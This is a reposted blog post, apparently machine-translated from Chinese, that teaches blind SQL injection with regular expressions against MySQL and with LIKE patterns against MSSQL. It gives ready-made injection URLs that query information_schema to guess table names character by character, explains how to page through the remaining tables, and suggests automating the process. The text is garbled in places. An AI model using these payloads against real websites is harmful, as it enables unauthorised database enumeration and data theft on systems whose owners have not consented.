Transferred from: http://hi.baidu.com/zh2089/item/819d2373d7834728d7a89c9e
Hray Note: Although the injection has been talking, but really proficient and can have how many people, a blind article, reproduced, convenient for themselves, but also hope that they have help
The previous blog post has already mentioned time-based injection attacks, but using regular expressions to make blind bets can save a lot of times:
-----------------------------------------MYSQL 5+-----------------------------------------
As we all know, in MySQL 5+, all the library names, indicating and field name information are stored in the INFORMATION_SCHEMA library. The attack mode is as follows:
1. Determine if the first character of the first table name is a character in a-Z, where Blind_sqli is the assumed known library name.
Note: ^[a-z in regular expressions] means that the start character in the string is within a-Z range
Index.php?id=1 and 1= (SELECT 1 from information_schema.tables WHERE table_schema= "Blind_sqli" and table_name REGEXP ' ^[a- Z] ' LIMIT 0,1)/*
2. Determine if the first character is a character in A-n
Index.php?id=1 and 1= (SELECT 1 from information_schema.tables WHERE table_schema= "Blind_sqli" and table_name REGEXP ' ^[a- N] ' LIMIT 0,1)/*
3. Determine that the character is n
Index.php?id=1 and 1= (SELECT 1 from information_schema.tables WHERE table_schema= "Blind_sqli" and table_name REGEXP ' ^n ' L Imit 0,1)/*
4. The replacement of the expression is as follows
Expression like this: ' ^n[a-z] ', ' ^ne[a-z ', ' ^new[a-z ', ' ^news[a-z] ', FALSE
At this point the table name is news, to verify that the regular expression is ' ^news$ ', but it is not necessary to directly judge table_name = ' news ' is OK.
5. Next, guess the rest of the table. You only need to modify limit 2,1 to blind the next table.
-----------------------------------------------MSSQL---------------------------------------------------
The regular expression used by MSSQL is not a standard regular expression, and the expression uses the LIKE keyword
Default.asp?id=1 and 1= (select TOP 1 1 from information_schema.tables WHERE table_schema= ' blind_sqli ' and table_name like ' [a-z]% ')
In the query statement, select top 1 is a combination oh, don't look wrong.
If you want to query other table names, because you can't use limit x,1 like MySQL, you can only use table_name not in (the SELECT top x table_name from information_schema.tables) meaning: The table name does not In the first X line, in fact, the query is the first line x+1.
For example, query the table name for the second row:
Default.asp?id=1 and 1= (select TOP 1 1 from information_schema.tables WHERE table_schema= ' blind_sqli ' and table_name not I N (SELECT TOP 1 table_name from information_schema.tables) and table_name like ' [a-z]% ')
The order of the expressions:
' news[a-z]% ', ' new[a-z]% ', ' ne[a-z]% ', ' n[a-z]% '
The reason that the expression news[a-z] is returned after the query is correct is that the% should represent 0-n characters, and "_" is used to represent only one character. So confirm if there is any further word Fuk use the following expression
' news% ' TRUE ' News_ ' FALSE
Similarly, you can get the field, the value, in the same way. This is no longer described in detail here.
PS: Blind is a physical activity, but understand the principle, programming Daniel can consider implementing a software Oh!
Regular expression attacks on SQL blinds